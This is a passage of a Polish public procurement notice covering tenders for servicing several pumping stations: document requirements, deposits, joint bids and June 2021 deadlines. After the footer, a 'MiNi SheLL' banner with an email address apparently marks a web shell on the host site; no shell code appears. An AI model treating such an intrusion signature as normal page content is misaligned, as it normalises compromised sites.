jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane,<br/>oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz oferty – zgodny w treści i wypełniony na podstawie wzoru stanowiącego Załącznik<br/>do niniejszej SWZ, sporządzony pod rygorem nieważności, w postaci elektronicznej i opatrzony<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.2.<br/>Formularz cenowy (uzupełniony w ramach danej części, na którą Wykonawca składa ofertę) –<br/>wypełniony na podstawie wzoru stanowiącego Załącznik do niniejszej SWZ, zgodnie z wymaganiami Opisu przedmiotu zamówienia stanowiących załączniki do niniejszej SWZ,<br/>sporządzony pod rygorem nieważności w postaci elektronicznej i opatrzony kwalifikowanym<br/>podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.3. Oświadczenie o<br/>niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, zgodne z treścią<br/>Załącznika do SWZ, aktualne na dzień składania ofert, celem potwierdzenia, że Wykonawca nie<br/>podlega wykluczeniu z postępowania na podstawie art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4<br/>ustawy Pzp oraz spełnia warunki udziału w postępowaniu określone w SWZ. W przypadku<br/>wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie składa każdy z<br/>Wykonawców wspólnie ubiegających się o zamówienie. Dokument sporządza się pod rygorem<br/>nieważności w postaci elektronicznej i opatrzony kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym lub podpisem osobistym4. Wykonawca, w przypadku polegania na<br/>zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z<br/>oświadczeniem, także oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału<br/>w postępowaniu podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia<br/>tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w<br/>jakim wykonawca powołuje się na jego zasoby.5. Wykonawca, który polega na zdolnościach lub<br/>sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą, zobowiązanie podmiotu<br/>udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby<br/>realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że<br/>wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>6. Pełnomocnictwa - winne być sporządzone w postaci elektronicznej i opatrzone<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, przez<br/>osoby uprawnione do reprezentowania firmy, zgodne z aktem rejestracyjnym lub kopii<br/>poświadczonej notarialnie przy użyciu podpisu elektronicznego.7. Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia, załączają oświadczenie, w którym ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.8.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie,<br/>z którego musi wynikać, które usługi wykonają poszczególni wykonawcy (Wykonawcy składają<br/>oświadczenia w oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym,<br/>podpisem elektronicznym podpisem zaufanym lub podpisem osobistym, przez osoby<br/>upoważnione do reprezentowania wykonawców zgodnie z formą reprezentacji określoną w<br/>dokumencie rejestrowym właściwym dla formy organizacyjnej lub w innym dokumencie)9.<br/>Dokument związany z samooczyszczeniem (jeżeli dotyczy) – tzw. „Self cleaning”.10. Wadium<br/>(jeżeli dotyczy) należy wnieść zgodnie z pkt 8 SWZ.11. Dokumenty potwierdzające uprawnienie<br/>do podpisania oferty oraz do podpisania lub poświadczenia za zgodność z oryginałem<br/>składanych oświadczeń lub dokumentów. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Część 1 - Pompownia Kąty - 1 000,00 zł<br/>Część 2 - Pompownia Wojnowice - 700,00 zł <br/>Część 3 - Pompownie: Zbęchy, Wonieść, Drzeczkowo, Nielęgowo, Separowo - 3 000,00 zł <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zamawiający, dopuszcza możliwość składania oferty przez dwóch lub więcej Wykonawców (w ramach oferty wspólnej w rozumieniu art. 58 ustawy Pzp) pod warunkiem, że taka oferta<br/>spełniać będzie następujące wymagania:1. Wykonawcy występujący wspólnie są zobowiązani<br/>do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego<br/>zamówieniapublicznego.2. Wszelka korespondencja prowadzona będzie przez Zamawiającego<br/>wyłącznie z pełnomocnikiem, którego adres należy wpisać w Formularzu oferty.3.<br/>Pełnomocnictwo lub inny dokument (np. umowa konsorcjum, spółki cywilnej) z którego wynika<br/>takie pełnomocnictwo należy złożyć razem z ofertą.4. W odniesieniu do warunków udziału<br/>określonych w pkt 7.2 SWZ,wymagania te muszą być spełnione wspólnie przez Wykonawców<br/>składających ofertę wspólną (nie musi ich spełniać osobno każdy z Wykonawców składających<br/>ofertę wspólną). Na ich potwierdzenie należy złożyć dokumenty określone w pkt 10.3 SWZ.5.<br/>Każdy z Wykonawców wspólnie ubiegających się o zamówienie składa oświadczenie o<br/>niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, na podstawie treści<br/>Załącznika do SWZ, aktualny na dzień składania ofert, celem wstępnego potwierdzenia, że<br/>każdy z Wykonawców ubiegających się wspólnie o zamówienie nie podlega wykluczeniu z<br/>postępowania oraz spełnia warunki udziału w postępowaniu określone w SWZ w zakresie, w<br/>którym każdy z nich wykazuje brak podstaw wykluczenia z postępowania oraz spełnia warunki<br/>udziału w postępowaniu. 6. Każdy z Wykonawców występujących wspólnie obowiązany jest do<br/>wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia publicznego.<br/>W takim przypadku oświadczenia lub dokumenty wymienione w pkt 10.2 SWZ składa każdy z<br/>Wykonawców występujących wspólnie.7. Zamawiający nie zastrzega obowiązku osobistego<br/>wykonania przez jednego z Wykonawców kluczowych części zamówienia.8. Wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z<br/>wykonawców, którzy wykonają roboty budowlane / usługi / dostawy, do realizacji których te<br/>zdolności są wymagane. W takiej sytuacji wykonawcy są zobowiązani dołączyć do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Umowa zostanie zawarta zgodnie ze wzorem Umowy, stanowiącym Załącznik do<br/>SWZ.Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w przypadkach<br/>określonych w Wzorze umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-09 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma zakupowa – pod adresem: https://przetargi.wody.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-09 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-08</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-27 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com